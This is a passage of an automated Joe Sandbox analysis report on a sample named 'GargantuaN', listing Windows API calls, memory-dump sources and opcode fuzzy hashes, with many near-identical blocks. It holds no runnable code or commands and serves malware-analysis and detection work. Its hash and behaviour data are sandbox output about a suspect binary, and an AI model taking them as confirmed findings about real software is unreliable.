                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AddressProc
                                                        • String ID:
                                                        • API String ID: 190572456-0
                                                        • Opcode ID: a9d9b2ef10fb513fc3f94481ce50a3b10afab8449d9cead8da39e55928bec693
                                                        • Instruction ID: 7758f7fb4a68bf819ca386f4187a6ce79ee48660b2d8de5ef759618fd4e175df
                                                        • Opcode Fuzzy Hash: a9d9b2ef10fb513fc3f94481ce50a3b10afab8449d9cead8da39e55928bec693
                                                        • Instruction Fuzzy Hash: E6F0A7322003169F8F125E68EC0099A7799EF01B607248125FA0DE7190FB31DA20E7B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D7CA2C,00000000,?,00D76CBE,?,00000008,?,00D791E0,?,?,?), ref: 00D78E38
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 6a0cd2aa39a4aa82b52dd4a7da18cdc5a77fce5fd0a09c4f7676a06fbffae780
                                                        • Instruction ID: aa69100f57a798c40a0a805889fc73dab45f596e365e2228714898d34d9d1eb8
                                                        • Opcode Fuzzy Hash: 6a0cd2aa39a4aa82b52dd4a7da18cdc5a77fce5fd0a09c4f7676a06fbffae780
                                                        • Instruction Fuzzy Hash: E0E06D3268662596EA7226659C0DB9FB648DB417B4F59C121BC5C96191FF22CC00A3F1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D55AC2
                                                          • Part of subcall function 00D5B505: __EH_prolog.LIBCMT ref: 00D5B50A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 1001810da14e339d306ec2473b11804a165370f32d6fa0b16a1757d6769a9341
                                                        • Instruction ID: 1410ee2608b501780a8882dfcbaf1db0ad697a3cf91b24b7a97fdf2ee827b642
                                                        • Opcode Fuzzy Hash: 1001810da14e339d306ec2473b11804a165370f32d6fa0b16a1757d6769a9341
                                                        • Instruction Fuzzy Hash: A1018C30810694DBDB29E7B8C0557EEFBA8DF64304F54848EA85A53282CBB41B08D7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00D595D6,?,?,?,?,?,00D82641,000000FF), ref: 00D5963B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ChangeCloseFindNotification
                                                        • String ID:
                                                        • API String ID: 2591292051-0
                                                        • Opcode ID: 14aa285c3c68591ad02ddc60a2b41c6c643ed03ea318499ea7270e76762354e8
                                                        • Instruction ID: b9aa9aab5f4f4bd69360796a7d827d49992159a82b003d4919de746951ab544e
                                                        • Opcode Fuzzy Hash: 14aa285c3c68591ad02ddc60a2b41c6c643ed03ea318499ea7270e76762354e8
                                                        • Instruction Fuzzy Hash: 51F08070481715DFDF304A24C458752F7E85B12322F081B1DDCF6475E0D771558D9760
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00D5A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00D5A592,000000FF,?,?), ref: 00D5A6C4
                                                          • Part of subcall function 00D5A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00D5A592,000000FF,?,?), ref: 00D5A6F2
                                                          • Part of subcall function 00D5A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00D5A592,000000FF,?,?), ref: 00D5A6FE
                                                        • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D5A598
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Find$FileFirst$CloseErrorLast
                                                        • String ID:
                                                        • API String ID: 1464966427-0
                                                        • Opcode ID: c6cf3f3905a1e9b944ed57bd6e21c514bc8751e5d39444fb9d62fbdcb9eda2c0
                                                        • Instruction ID: d2ced23e7c81abbb02d63a0895643b6d34c90754a4e353588f44ea2897decc1e
                                                        • Opcode Fuzzy Hash: c6cf3f3905a1e9b944ed57bd6e21c514bc8751e5d39444fb9d62fbdcb9eda2c0
                                                        • Instruction Fuzzy Hash: 42F089310087A0AACF2257B84905BDB7B90AF15333F058B49FDFD52196D275509C9B33
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadExecutionState.KERNEL32(00000001), ref: 00D60E3D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ExecutionStateThread
                                                        • String ID:
                                                        • API String ID: 2211380416-0
                                                        • Opcode ID: 32a73730235763dad749d91949bc1fc3d0bdea669a542a8b83bde3c6f778bcc7
                                                        • Instruction ID: a32d7957baddc543c827dd047d1c1e9d9a275721f3266d06e29a77833f66a93d
                                                        • Opcode Fuzzy Hash: 32a73730235763dad749d91949bc1fc3d0bdea669a542a8b83bde3c6f778bcc7
                                                        • Instruction Fuzzy Hash: F1D02B14B1116517DF11372C28197FF2D0ACFD7711F0C0026F84D97383CE46488AA272
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GdipAlloc.GDIPLUS(00000010), ref: 00D6A62C
                                                          • Part of subcall function 00D6A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D6A3DA
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Gdip$AllocBitmapCreateFromStream
                                                        • String ID:
                                                        • API String ID: 1915507550-0
                                                        • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                        • Instruction ID: e84654e7f19a843b94cee8f94cd110668b4be96bf19cd305d61963e29a883845
                                                        • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                        • Instruction Fuzzy Hash: DCD0C77121060977DF416FA9CD12A6E7695EB10344F04C125B8C1E5151EAB1D9109972
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DloadProtectSection.DELAYIMP ref: 00D6E5E3
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: DloadProtectSection
                                                        • String ID:
                                                        • API String ID: 2203082970-0
                                                        • Opcode ID: 92107a391c2c43ff924d161861fd030ef991b57d6060a4d5a24387fe9735d177
                                                        • Instruction ID: 92c7ced35a5fca36ca74f95dbd671a1c9069910d3baf85f6b4be2f66ad152888
                                                        • Opcode Fuzzy Hash: 92107a391c2c43ff924d161861fd030ef991b57d6060a4d5a24387fe9735d177
                                                        • Instruction Fuzzy Hash: A5D022BC0C0340CFC301EBE8A8627183B50F320700FE40201F147C2292DBA090C2CB3A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00D61B3E), ref: 00D6DD92
                                                          • Part of subcall function 00D6B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D6B579
                                                          • Part of subcall function 00D6B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D6B58A
                                                          • Part of subcall function 00D6B568: IsDialogMessageW.USER32(0002047E,?), ref: 00D6B59E
                                                          • Part of subcall function 00D6B568: TranslateMessage.USER32(?), ref: 00D6B5AC
                                                          • Part of subcall function 00D6B568: DispatchMessageW.USER32(?), ref: 00D6B5B6
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                        • String ID:
                                                        • API String ID: 897784432-0
                                                        • Opcode ID: c4ef1170f49dc1d629779f54ed5d35c0a86684b4b4a12045fab4e8f0b313cac0
                                                        • Instruction ID: 71321ebc4834f3ce12b880d7fb3787bffaa4a79db47866fbb14896b8f11cabb7
                                                        • Opcode Fuzzy Hash: c4ef1170f49dc1d629779f54ed5d35c0a86684b4b4a12045fab4e8f0b313cac0
                                                        • Instruction Fuzzy Hash: 62D09E31144300BBD6012B51CD06F0F7AA6EF89B04F004555B285B40B1C672AD71EB36
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(000000FF,00D597BE), ref: 00D598C8
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 7cf896f020fa96a19e9b63c746cb59b1630e1fc72ef7a8ed781ee7bcd79068be
                                                        • Instruction ID: 8cdde8cecc3f09d20a42aa1940c84c7b864c92c162c151c7a6fea02b471ccdb5
                                                        • Opcode Fuzzy Hash: 7cf896f020fa96a19e9b63c746cb59b1630e1fc72ef7a8ed781ee7bcd79068be
                                                        • Instruction Fuzzy Hash: 81C01234400205C68E308A24986809ABB22AA537A77B88795C828CA0A1C332CC8FEB21
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: b1ea826c082170f754326cdc200d57755d3f81c354cd4cafec2ef91ee8acbcfc
                                                        • Instruction ID: e07bfb588cc83871d28625970db73c2919f56a075e184a1f47030d092e7e18db
                                                        • Opcode Fuzzy Hash: b1ea826c082170f754326cdc200d57755d3f81c354cd4cafec2ef91ee8acbcfc
                                                        • Instruction Fuzzy Hash: 2CB012DD268300FE310461491C12C3B030CC0C2B10330843EFC02C0480D850EC082871
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 7e31a018d99b338a54d17320b30718c64b27cd628fada68dbba9093666159a78
                                                        • Instruction ID: cb7ecba7894fffb821985b78c007aeaec5f9038c5a5352507af8f74e674408b8
                                                        • Opcode Fuzzy Hash: 7e31a018d99b338a54d17320b30718c64b27cd628fada68dbba9093666159a78
                                                        • Instruction Fuzzy Hash: 9EB012D9268300EE3144A2091C02C37030CC0C2B10330C03EFC0AC1280D850EC0C2A71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 124dbce6d6e27cc8a6e3d79ae8011ec96ff10decdde7f7556a2eb2b36cb1e2f8
                                                        • Instruction ID: 96ea81d299fbe6adbe3f63eadd601862f27726dd4417f2e633f50780cc5d4e10
                                                        • Opcode Fuzzy Hash: 124dbce6d6e27cc8a6e3d79ae8011ec96ff10decdde7f7556a2eb2b36cb1e2f8
                                                        • Instruction Fuzzy Hash: 2FB012DD26C300EE3144A14D1C02C3B030CC0C1B10330403EF806C1180D860AC082A71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 6cda4e1fa78e0cc86403ee76f9d3d18e61d2a6e015aee8a852781774236f65a4
                                                        • Instruction ID: aeafc1b64ce7b944e5bf0acfe948e85d44e8f7cb2dcb00244d8faa67b34eaca4
                                                        • Opcode Fuzzy Hash: 6cda4e1fa78e0cc86403ee76f9d3d18e61d2a6e015aee8a852781774236f65a4
                                                        • Instruction Fuzzy Hash: 3DB012E92A8200EE3144A1091D02C37038CC0C1B10330403EF806C1180DC50AD092971
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 89e7cb1f71a57b08ee1fbb7a50d51ec8ecc2ab169ec03f4dc7e37c20b9f556a2
                                                        • Instruction ID: 33e969d610b9a82a82434e990f601542a505a75156ce767e14540da0717cabdb
                                                        • Opcode Fuzzy Hash: 89e7cb1f71a57b08ee1fbb7a50d51ec8ecc2ab169ec03f4dc7e37c20b9f556a2
                                                        • Instruction Fuzzy Hash: 63B012E9269340FE3288A2091C02C37030DC0C1B10330413EF806C1180D850BC4C2971
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 92633e83e7dfbfeb5e595a629b4a2f63fdd485efb43a2fafdd1273c393fe2557
                                                        • Instruction ID: 2010766c8fab4c66ce08f9cc4a3ce721bfc9f47bf79cf88c58e73baae5b53cdb
                                                        • Opcode Fuzzy Hash: 92633e83e7dfbfeb5e595a629b4a2f63fdd485efb43a2fafdd1273c393fe2557
                                                        • Instruction Fuzzy Hash: 18B012D9269240FE3248A1091C02C37030DC0C2B10330803EFC06C1180D850EC082971
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: fefb0a5c58ee829fca2397738552854db479c17d6bf63e5599864166ee031c47
                                                        • Instruction ID: 8464d62c8b02ff436f6b0b1e71b8a505a524d3a83a40dcf86d0e5b4735c97916
                                                        • Opcode Fuzzy Hash: fefb0a5c58ee829fca2397738552854db479c17d6bf63e5599864166ee031c47
                                                        • Instruction Fuzzy Hash: 6EB012D9279240FE3248A1091C02C37134DC4C1B10330403EF807C1180D860AC082971
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: f1e8a12643cd6ad222f5756ef017f2bdb02744971e6ef29f4d4b5f57b4670607
                                                        • Instruction ID: f3cd6444f939356b108111612138c080e03c4b0733c72827f33a6a0b72d49f55
                                                        • Opcode Fuzzy Hash: f1e8a12643cd6ad222f5756ef017f2bdb02744971e6ef29f4d4b5f57b4670607
                                                        • Instruction Fuzzy Hash: F0B012D9268200EE3144A1191C02C37034CC0C2B10330803EFC06C1180D850EC082971
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 7890de42a6884b508e93f00f5d46f1d7fa8a003e64adf44625217359c5f91853
                                                        • Instruction ID: 8c1c219ace0034cef79de0877603dd4619358135cca3701e49f47ca2257f8535
                                                        • Opcode Fuzzy Hash: 7890de42a6884b508e93f00f5d46f1d7fa8a003e64adf44625217359c5f91853
                                                        • Instruction Fuzzy Hash: 68B012E9268200FE3144A1091C02C37030CC4C2F10330803EFC06C1184D850ED082D71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: a2ba8156448bb3c500e98fb8a99ae50e0f4f63d0b5c6658ddb76206467ca88fd
                                                        • Instruction ID: dde3149bae70c80a783df90ab55c6286f884ba7b0fd4969d6a82d676770d6bfb
                                                        • Opcode Fuzzy Hash: a2ba8156448bb3c500e98fb8a99ae50e0f4f63d0b5c6658ddb76206467ca88fd
                                                        • Instruction Fuzzy Hash: E6B012D9368340FE3184A2091C02C37030CC0C1B10330813EF80AC1280D850BC4C2971
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
